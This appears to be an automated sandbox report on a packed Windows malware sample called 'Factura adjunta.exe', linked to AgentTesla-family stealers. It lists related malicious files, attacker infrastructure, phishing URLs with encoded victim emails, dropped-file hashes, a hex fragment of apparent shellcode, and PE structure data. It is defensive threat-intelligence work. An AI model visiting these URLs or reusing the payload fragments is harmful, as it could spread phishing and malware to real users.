                          • ip-api.com/line/?fields=hosting
                          kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          bv8iPF7cTY.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          jsLnybSs43.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • ip-api.com/line/?fields=hosting
                          104.26.12.205SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exeGet hashmaliciousConti, PureLog Stealer, Targeted RansomwareBrowse
                          • api.ipify.org/
                          482730621.exeGet hashmaliciousStealitBrowse
                          • api.ipify.org/?format=json
                          482730621.exeGet hashmaliciousStealitBrowse
                          • api.ipify.org/?format=json
                          Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                          • api.ipify.org/?format=json
                          Sky-Beta.exeGet hashmaliciousStealitBrowse
                          • api.ipify.org/?format=json
                          SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                          • api.ipify.org/
                          lods.cmdGet hashmaliciousRemcosBrowse
                          • api.ipify.org/

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          mail.floormelody.com.sgrQoutation.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 101.100.211.111
                          Cotizaci#U00f3n.exeGet hashmaliciousAgentTeslaBrowse
                          • 101.100.211.111
                          ip-api.comthegreatestexecutor.batGet hashmaliciousUnknownBrowse
                          • 208.95.112.1
                          thegreatestexecutor.batGet hashmaliciousUnknownBrowse
                          • 208.95.112.1
                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          6bdudXAsQW.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          H50bdqfVH2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          bv8iPF7cTY.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          jsLnybSs43.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          api.ipify.orgArrival Notice.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.12.205
                          rnoahcrypter.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 104.26.13.205
                          tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 104.26.13.205
                          19808bS58f.exeGet hashmaliciousAgentTeslaBrowse
                          • 172.67.74.152
                          SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6737.3783.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.13.205
                          9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 172.67.74.152
                          0VcrCVxnMP.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 172.67.74.152
                          E48ALuMJ3m.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 104.26.13.205
                          MzjwuZnJF0.exeGet hashmaliciousGuLoaderBrowse
                          • 104.26.12.205
                          VG0x1LZCFb.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.13.205

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSPayment receipt_1.docx.docGet hashmaliciousLokibotBrowse
                          • 104.21.83.128
                          original (4).emlGet hashmaliciousUnknownBrowse
                          • 1.1.1.1
                          https://ayssaless.com/?dybkhjzuGet hashmaliciousHTMLPhisherBrowse
                          • 104.17.2.184
                          http://sagility.comGet hashmaliciousUnknownBrowse
                          • 104.22.71.197
                          https://4smgswwi.r.us-west-2.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9917688bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541primmacy.com%252Fwinner%252F77663%252F%252FYmVja3kuYmFyY2tsZXlAY2xlYXJ3YXRlcnBhcGVyLmNvbQ==/1/0101019079f53360-ad062f3a-6c08-4c14-8569-269fb9f20297-000000/mkI5299-kBX9yyfDwVrQlybi5Wk=382Get hashmaliciousHTMLPhisherBrowse
                          • 104.17.2.184
                          updates.jsGet hashmaliciousNetSupport RATBrowse
                          • 104.26.0.231
                          https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//newguy343rwetr3434.pages.dev/#?email=ZGlhbmUucHVydmV5QGtwdS5jYQ==Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          https://us-west-2.protection.sophos.com/?d=ccl.org&u=aHR0cHM6Ly93d3cuY2NsLm9yZy9sZWFkZXJzaGlwLXNvbHV0aW9ucy9sZWFkZXJzaGlwLWNvYWNoaW5nL2V4ZWN1dGl2ZS1jb2FjaGluZy8=&i=NjI5NzZmYjdjMjFiNDIxMjEzN2I5MjQ0&t=MEZ3VmI0U1h1SlZJSHQ0MUZXZm5xMUNoZDhEZ0JwdWlUR3IzWnpoUUgyRT0=&h=54867f59a225422a805dc298de38f9c8&s=AVNPUEhUT0NFTkNSWVBUSVaqVc7akbkrLF9qV6KT1t7Wq__wYhcpX8W-U88SzpdSfAGet hashmaliciousUnknownBrowse
                          • 162.247.243.29
                          https://payyit.com/Get hashmaliciousUnknownBrowse
                          • 1.1.1.1
                          https://reliancechemicals.com.au/Get hashmaliciousUnknownBrowse
                          • 162.159.136.45
                          VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSGrQoutation.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 101.100.211.111
                          GLES Inquiry G-6463.bat.exeGet hashmaliciousAgentTeslaBrowse
                          • 101.100.211.31
                          Cotizaci#U00f3n.exeGet hashmaliciousAgentTeslaBrowse
                          • 101.100.211.111
                          https://newreceipt.standard.us-east-1.oortech.com/wolf.htmlGet hashmaliciousHTMLPhisherBrowse
                          • 119.31.232.160
                          Quotation specifications draft20001.exeGet hashmaliciousAgentTeslaBrowse
                          • 111.235.137.78
                          jZ6ejWIrSV.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 43.245.97.92
                          UIzU7wk8Yn.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 43.245.97.34
                          ffFHabW0k8.elfGet hashmaliciousGafgyt, MiraiBrowse
                          • 43.245.97.91
                          sh.elfGet hashmaliciousGafgytBrowse
                          • 43.245.97.92
                          5h7bS5VNtY.exeGet hashmaliciousAgentTeslaBrowse
                          • 101.100.239.36
                          TUT-ASUSthegreatestexecutor.batGet hashmaliciousUnknownBrowse
                          • 208.95.112.1
                          thegreatestexecutor.batGet hashmaliciousUnknownBrowse
                          • 208.95.112.1
                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          6bdudXAsQW.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          H50bdqfVH2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          bv8iPF7cTY.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          jsLnybSs43.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.W64.MSIL_Rozena.H.gen.Eldorado.13862.32197.exeGet hashmaliciousUnknownBrowse
                          • 104.26.12.205
                          SecuriteInfo.com.W64.MSIL_Rozena.H.gen.Eldorado.13862.32197.exeGet hashmaliciousUnknownBrowse
                          • 104.26.12.205
                          Arrival Notice.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.12.205
                          https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                          • 104.26.12.205
                          file.exeGet hashmaliciousUnknownBrowse
                          • 104.26.12.205
                          http://yournewstech.comGet hashmaliciousUnknownBrowse
                          • 104.26.12.205
                          PFbc2O8eXUJp.zipGet hashmaliciousUnknownBrowse
                          • 104.26.12.205
                          https://www.bnaminexg.com/Invoice-yetdr.zipGet hashmaliciousUnknownBrowse
                          • 104.26.12.205
                          rnoahcrypter.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 104.26.12.205
                          2cFFfHDG7D.msiGet hashmaliciousAteraAgentBrowse
                          • 104.26.12.205

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Temp\Halitherses

                          Download File
                          Process:C:\Users\user\Desktop\Factura adjunta.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):268800
                          Entropy (8bit):7.886180155743195
                          Encrypted:false
                          SSDEEP:6144:hDRGks8HBo3jAVAdz+6M5aPFE3Wtb8V77N4V61T2:bGOHBonBcW5yCV61y
                          MD5:FBC5415B46CF515A9E58B41D50151D6D
                          SHA1:BF3C211784D63BED5C261CB93D478061C70FFD80
                          SHA-256:42ED9579EED93C2F3927A6F8371D1FFD4C8F74964F13735828DEFF4B0FC8D873
                          SHA-512:9CBD0091DBB9150A63351227196818FFD2664B536E4EA96F4A3EB8A06297EBD32C9E9CFC4B87FAE3225EF4F9981EAC03C1FEB47CF73A1D96084621BDEDDCC091
                          Malicious:false
                          Reputation:low
                          Preview:.o.A5ZVBP9PL..HA.ZVBT9PL.5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PL.5HA8E.LT.Y.y.I..{.*=Jp<*Z/3W7v!5W>#,.*$.(#,tP>l.z.a[52'z4]F|5HA6ZVB<).atD.?.+.<xH.2j.7?.+.<_..2sD.?.+.<.H.2j.&?*+.<f.92.D.?.y-<yH.2.\+).+.<T9PLX5HA6ZVBT9PL...'6ZVB.|PL.4LAB.V.T9PLX5HA.ZuC_8YLX.IA6$TBT9PLw.HA6JVBT.QLX5.A6JVBT;PL]5HA6ZVBQ9PLX5HA6:RBT=PL..JA4ZV.T9@LX%HA6ZFBT)PLX5HA&ZVBT9PLX5HA.OTB.9PLXUJA6.WBT9PLX5HA6ZVBT9PLX5HA6ZVB..QLD5HA6ZVBT9PLX5HA6ZVBT9PLX5HA.WTB.9PLX5HA6ZVBT.QL.4HA6ZVBT9PLX5HA6ZVBT9PLX5HA..3: 9PL@.IA6JVBT.QLX1HA6ZVBT9PLX5HA.ZV"zK4-,THA.7VBT.QLX[HA6.WBT9PLX5HA6ZVB.9P.vQ)5WZVB..PLX.JA6LVBT3RLX5HA6ZVBT9PL.5H..(%079PLX.IA6:TBT.QLX.JA6ZVBT9PLX5HAvZV.T9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA6ZVBT9PLX5HA

                          C:\Users\user\AppData\Local\Temp\Lymnaeidae

                          Download File
                          Process:C:\Users\user\Desktop\Factura adjunta.exe
                          File Type:ASCII text, with very long lines (28756), with no line terminators
                          Category:dropped
                          Size (bytes):28756
                          Entropy (8bit):3.5878427972318834
                          Encrypted:false
                          SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbA+IL26cz24vfF3if6gm:miTZ+2QoioGRk6ZklputwjpjBkCiw2Rv
                          MD5:C96F40DA03D41855B8211EBD3BFAA8DE
                          SHA1:3AB94704937D6FCF72C6B9FA8717701D7D42B2FD
                          SHA-256:C23173D80BEBA1DAFF401543BB68306B616EEFD77C3811F051B6BF85EE36FA75
                          SHA-512:3C3CC97B3E643629D321C70EAC0DB8310BCCADD56E82AB80EAE5C1518963C8D0703A82EC4219B1A0840B223DD108A9F746074FF7361B2F341FAAA334ABA71BEA
                          Malicious:false
                          Reputation:low
                          Preview:8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

                          C:\Users\user\AppData\Local\Temp\aut663B.tmp

                          Download File
                          Process:C:\Users\user\Desktop\Factura adjunta.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):262882
                          Entropy (8bit):7.978338497182499
                          Encrypted:false
                          SSDEEP:6144:shUkL9YkiFIjgNRaA6DGr4mJBjB1knU4TQMvj7HVJpx9Ph7OXDTQ1gkoNf:sWkibWjMrxXl1eQ8ZLQL/Nf
                          MD5:2C1C4D7FBB0D7858BA55162133EC18F3
                          SHA1:07FCC299410E24DDE9AFB55A75C3F76B05D558CC
                          SHA-256:C42259365C9EA05F0233373A66ED478B1F20A1F08E87CF87BDF0511985787730
                          SHA-512:41ABBE9722CD2E8C5DF64F53276A19E82ABD4BAC84AEE960005AFE30631737A9B40F0622F814E31CC2D7BA97FDB2239EB3963F034710A17F5604F079EEE6C7ED
                          Malicious:false
                          Reputation:low
                          Preview:EA06..........j.B.Nj..?*.A....@..15.Pf......}[...qE.S*.......w...{J.O%U.|.7.Hf.y.Y..I"....P.[#....5.I.SJ.......a.Q4S..y<.R7S+TZo?.....w.es.....@..&....4js2....K.yy..!U.\........h...1._*...A.... .Mu.WZ.~qY.V5....IT.0......xbj .. .3...2........U*.R{P.h....V.U'4.ebJ.H.UIH.&$.%..S.( .cU.Pf.......Ti.@.O.-W.P......;.@...1.......EI....`...|1j.ZEz..%...A7...l....T| ..2.Q..j...$.`..f....gR.x.....bQ%.M...x..:.\8u....<v.Z.@..>......{..Q.3z./...J........R..*E..0..r..35.c.Yl.;1..`2..&7.O.|....2M?..5..>.9..!.......$.N.l..3Q..p...n 4..O.......CoA.v..X............N..<....c...._..N....W.....:..8..t-_._....49.-A.G5....cF.U..._.!...yz......Oj....C...9.H.b...\.U..@....,.....9.S-^{.....X....9..j..x...&..!...v...\#=.._..M.UJ.o......SKV.u(..7g.H.."....[...5..k...Ght.......<}...*...\..@.m$...:.4..cVjg.)h..i....u8..;..eJm/.o"......YdS...M_..#..E.mZ....3.q.Ug=i..!..Am.,.1R...kk..D`6.u4...Ap6].v.t.F......;.\.8z.+o....Vj....MiT...g.l...A.H.p...`..s) .._.S..q.3.kC

                          C:\Users\user\AppData\Local\Temp\aut6699.tmp

                          Download File
                          Process:C:\Users\user\Desktop\Factura adjunta.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):9818
                          Entropy (8bit):7.599616234036834
                          Encrypted:false
                          SSDEEP:192:65jwEiq2KWeTY6Vi+7MX9O1JZNO3yLyD416WBAonuDiH8OSkka/WKQ+3bB:I6qTRPI9ObSCGD413BAonuDicOSkkauw
                          MD5:3A0F42A43F4C63BC492C975211413FBE
                          SHA1:1DCC2028B9BA1A51D3105607FDDFF14A77ED74A6
                          SHA-256:587E39232EDC6FB67B79DC5429308C46615EA716957D0648FE508266AFF35834
                          SHA-512:4843DD200251978238B249012017761C343947C09E3E965328BF62B9690830139DDAAD7F7916E4554995BACD0A751BFE513868EB4E217ADF85620F52F63E4A0A
                          Malicious:false
                          Reputation:low
                          Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                          Entropy (8bit):7.943872026812389
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.39%
                          • UPX compressed Win32 Executable (30571/9) 0.30%
                          • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          File name:Factura adjunta.exe
                          File size:677'376 bytes
                          MD5:d1e434198eb156114e542143d9a16745
                          SHA1:ed52264091479d5cd8eea42edd851eaf69958f0a
                          SHA256:093020f94f927cc5488bc0853d06c3c1ec59c59d337ad66e3ff1c3ded8e6bab1
                          SHA512:085080a0582c7aed1ed1a240c7ba08123e612e15d612a199216326efdfaf4ec8fda20e7d96dac49c32459fad48f0fb7821b64751b6178b00979b63835246561d
                          SSDEEP:12288:HYV6MorX7qzuC3QHO9FQVHPF51jgcTe7nl2hmXWif7G/IvrxTkzrfZt930:UBXu9HGaVHSBXGJ/IjFkb930
                          TLSH:45E423C10BD58E3AC4B123B5C47B6C40A8257830CBD93B6B8794F24AF8767D2E457A5E
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                          File Icon

                          Icon Hash:aaf3e3e3938382a0

                          Static PE Info

                          General

                          Entrypoint:0x527080
                          Entrypoint Section:UPX1
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x668530AF [Wed Jul 3 11:06:23 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:fc6683d30d9f25244a50fd5357825e79

                          Entrypoint Preview

                          Instruction
                          pushad
                          mov esi, 004D1000h
                          lea edi, dword ptr [esi-000D0000h]
                          push edi
                          jmp 00007FA4F4ADCDEDh
                          nop
                          mov al, byte ptr [esi]
                          inc esi
                          mov byte ptr [edi], al
                          inc edi
                          add ebx, ebx
                          jne 00007FA4F4ADCDE9h
                          mov ebx, dword ptr [esi]
                          sub esi, FFFFFFFCh
                          adc ebx, ebx
                          jc 00007FA4F4ADCDCFh
                          mov eax, 00000001h
                          add ebx, ebx
                          jne 00007FA4F4ADCDE9h
                          mov ebx, dword ptr [esi]
                          sub esi, FFFFFFFCh
                          adc ebx, ebx
                          adc eax, eax
                          add ebx, ebx
                          jnc 00007FA4F4ADCDEDh
                          jne 00007FA4F4ADCE0Ah
                          mov ebx, dword ptr [esi]
                          sub esi, FFFFFFFCh
                          adc ebx, ebx
                          jc 00007FA4F4ADCE01h
                          dec eax
                          add ebx, ebx
                          jne 00007FA4F4ADCDE9h
                          mov ebx, dword ptr [esi]
                          sub esi, FFFFFFFCh
                          adc ebx, ebx
                          adc eax, eax
                          jmp 00007FA4F4ADCDB6h
                          add ebx, ebx
                          jne 00007FA4F4ADCDE9h
                          mov ebx, dword ptr [esi]
                          sub esi, FFFFFFFCh
                          adc ebx, ebx
                          adc ecx, ecx
                          jmp 00007FA4F4ADCE34h
                          xor ecx, ecx
                          sub eax, 03h
                          jc 00007FA4F4ADCDF3h
                          shl eax, 08h
                          mov al, byte ptr [esi]
                          inc esi
                          xor eax, FFFFFFFFh
                          je 00007FA4F4ADCE57h
                          sar eax, 1
                          mov ebp, eax
                          jmp 00007FA4F4ADCDEDh
                          add ebx, ebx
                          jne 00007FA4F4ADCDE9h
                          mov ebx, dword ptr [esi]
                          sub esi, FFFFFFFCh
                          adc ebx, ebx
                          jc 00007FA4F4ADCDAEh
                          inc ecx
                          add ebx, ebx
                          jne 00007FA4F4ADCDE9h
                          mov ebx, dword ptr [esi]
                          sub esi, FFFFFFFCh
                          adc ebx, ebx
                          jc 00007FA4F4ADCDA0h
                          add ebx, ebx
                          jne 00007FA4F4ADCDE9h
                          mov ebx, dword ptr [esi]
                          sub esi, FFFFFFFCh
                          adc ebx, ebx
                          adc ecx, ecx
                          add ebx, ebx
                          jnc 00007FA4F4ADCDD1h
                          jne 00007FA4F4ADCDEBh
                          mov ebx, dword ptr [esi]
                          sub esi, FFFFFFFCh
                          adc ebx, ebx
                          jnc 00007FA4F4ADCDC6h
                          add ecx, 02h
                          cmp ebp, FFFFFB00h
                          adc ecx, 02h
                          lea edx, dword ptr [edi+ebp]
                          cmp ebp, FFFFFFFCh
                          jbe 00007FA4F4ADCDF0h
                          mov al, byte ptr [edx]

                          Rich Headers

                          Programming Language:
                          • [ASM] VS2013 build 21005
                          • [ C ] VS2013 build 21005
                          • [C++] VS2013 build 21005
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [ASM] VS2013 UPD5 build 40629
                          • [RES] VS2013 build 21005
                          • [LNK] VS2013 UPD5 build 40629

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1768a80x424.rsrc
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1280000x4e8a8.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x176ccc0xc.rsrc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1272640x48UPX1
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          UPX00x10000xd00000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          UPX10xd10000x570000x56400ecb6bb56c11af8d98a03b4cbdc5aeceaFalse0.9873160099637681data7.93545513520233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x1280000x4f0000x4ee00360fdee11c7041643536b3e39385d838False0.9351599643423137data7.911861214724934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0x1285ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                          RT_ICON0x1286d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                          RT_ICON0x1288040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                          RT_ICON0x1289300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                          RT_ICON0x128c1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                          RT_ICON0x128d480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                          RT_ICON0x129bf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                          RT_ICON0x12a4a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                          RT_ICON0x12aa0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                          RT_ICON0x12cfb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                          RT_ICON0x12e0640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                          RT_MENU0xce4a00x50emptyEnglishGreat Britain0
                          RT_STRING0xce4f00x594emptyEnglishGreat Britain0
                          RT_STRING0xcea840x68aemptyEnglishGreat Britain0
                          RT_STRING0xcf1100x490emptyEnglishGreat Britain0
                          RT_STRING0xcf5a00x5fcemptyEnglishGreat Britain0
                          RT_STRING0xcfb9c0x65cemptyEnglishGreat Britain0
                          RT_STRING0xd01f80x466emptyEnglishGreat Britain0
                          RT_STRING0xd06600x158emptyEnglishGreat Britain0
                          RT_RCDATA0x12e4d00x47e3edata1.000326018297777
                          RT_GROUP_ICON0x1763140x76dataEnglishGreat Britain0.6610169491525424
                          RT_GROUP_ICON0x1763900x14dataEnglishGreat Britain1.25
                          RT_GROUP_ICON0x1763a80x14dataEnglishGreat Britain1.15
                          RT_GROUP_ICON0x1763c00x14dataEnglishGreat Britain1.25
                          RT_VERSION0x1763d80xdcdataEnglishGreat Britain0.6181818181818182
                          RT_MANIFEST0x1764b80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                          Imports

                          DLLImport
